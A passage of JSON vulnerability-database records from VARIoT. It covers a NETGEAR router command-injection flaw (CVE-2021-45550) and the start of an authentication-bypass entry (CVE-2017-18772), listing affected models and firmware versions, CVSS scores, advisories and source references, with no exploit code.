"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.56"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.78"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.62"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "xr500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.56"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.63"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "d3600",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6250",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dgn2200",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6100",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d7800",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dgn2200b",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"cve": "CVE-2021-45550",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2021-45550",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2021-45550",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.7,
"id": "CVE-2021-45550",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-45550",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-45550",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-45550",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-45550",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202112-2368",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-45550",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56. plural NETGEAR A command injection vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.78, D6100 prior to 1.0.0.63, D6220 prior to 1.0.0.52, D6400 prior to 1.0.0.86, D7800 prior to 1.0.1.56, D8500 prior to 1.0.3.44, DGN2200Bv4 prior to 1.0.0.109, DGN2200v4 prior to 1.0.0.110, R6250 prior to 1.0.4.34, R6300v2 prior to 1.0.4.34, R6400 prior to 1.0.1.46, R6400v2 prior to 1.0.2.66, R6700 prior to 1.0.2.6, R6700v3 prior to 1.0.2.66, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R7000 prior to 1.0.9.42, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.50, R7300 prior to 1.0.0.70, R7900 prior to 1.0.3.8, R7900P prior to 1.4.1.30, R8000 prior to 1.0.4.28, R8000P prior to 1.4.1.30, R8300 prior to 1.0.2.128, R8500 prior to 1.0.2.128, WNDR3400v3 prior to 1.0.1.24, WNR3500Lv2 prior to 1.2.0.62, and XR500 prior to 2.3.2.56",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-45550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "VULMON",
"id": "CVE-2021-45550"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-45550",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-45550",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"id": "VAR-202112-2398",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4079818879166666
},
"last_update_date": "2024-11-23T22:40:38.067000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Post-Authentication\u00a0Command\u00a0Injection\u00a0on\u00a0Some\u00a0Routers,\u00a0PSV-2018-0376",
"trust": 0.8,
"url": "https://kb.netgear.com/000064049/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-PSV-2018-0376"
},
{
"title": "Netgear NETGEAR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=176379"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000064049/security-advisory-for-post-authentication-command-injection-on-some-routers-psv-2018-0376"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45550"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-26T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"date": "2023-01-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"date": "2021-12-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"date": "2021-12-26T01:15:15.367000",
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-05T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45550"
},
{
"date": "2023-01-04T06:52:00",
"db": "JVNDB",
"id": "JVNDB-2021-017104"
},
{
"date": "2022-01-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2368"
},
{
"date": "2024-11-21T06:32:29.523000",
"db": "NVD",
"id": "CVE-2021-45550"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0NETGEAR\u00a0 Command injection vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017104"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2368"
}
],
"trust": 0.6
}
}
var-202004-1337
Vulnerability from variot
Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8. plural NETGEAR There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R8500, etc. are all products of NETGEAR. NETGEAR R8500 is a wireless router. NETGEAR WNR2000 is a wireless router. NETGEAR EX3700 is a wireless WiFi signal range extender
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1337",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.8"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "wnr2000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300dst_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
}
]
},
"cve": "CVE-2017-18772",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18772",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014919",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2020-31319",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18772",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18772",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014919",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18772",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18772",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014919",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-31319",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1876",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8. plural NETGEAR There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R8500, etc. are all products of NETGEAR. NETGEAR R8500 is a wireless router. NETGEAR WNR2000 is a wireless router. NETGEAR EX3700 is a wireless WiFi signal range extender",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18772"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNVD",
"id": "CNVD-2020-31319"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18772",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919",
"trust": 0.8
},
{
